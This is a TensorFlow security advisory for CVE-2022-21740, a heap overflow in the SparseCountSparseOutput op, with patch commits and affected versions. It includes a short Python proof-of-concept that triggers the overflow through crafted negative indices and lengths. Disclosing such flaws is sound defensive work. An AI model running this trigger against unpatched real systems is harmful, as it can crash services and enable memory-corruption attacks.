## TFSA-2022-020: Heap overflow in `SparseCountSparseOutput`

### CVE Number
CVE-2022-21740

### Impact
The [implementation of `SparseCountSparseOutput`](https://github.com/tensorflow/tensorflow/blob/5100e359aef5c8021f2e71c7b986420b85ce7b3d/tensorflow/core/kernels/count_ops.cc#L168-L273) is vulnerable to a heap overflow:

```python
import tensorflow as tf
import numpy as np

tf.raw_ops.SparseCountSparseOutput(
  indices=[[-1,-1]],
  values=[2],
  dense_shape=[1, 1],
  weights=[1],
  binary_output=True,
  minlength=-1,
  maxlength=-1,
  name=None)
```

### Patches
We have patched the issue in GitHub commits [2b7100d6cdff36aa21010a82269bc05a6d1cc74a](https://github.com/tensorflow/tensorflow/commit/2b7100d6cdff36aa21010a82269bc05a6d1cc74a) and [adbbabdb0d3abb3cdeac69e38a96de1d678b24b3](https://github.com/tensorflow/tensorflow/commit/adbbabdb0d3abb3cdeac69e38a96de1d678b24b3).

The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.

### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.

### Attribution
This vulnerability has been reported by Faysal Hossain Shezan from University of Virginia.
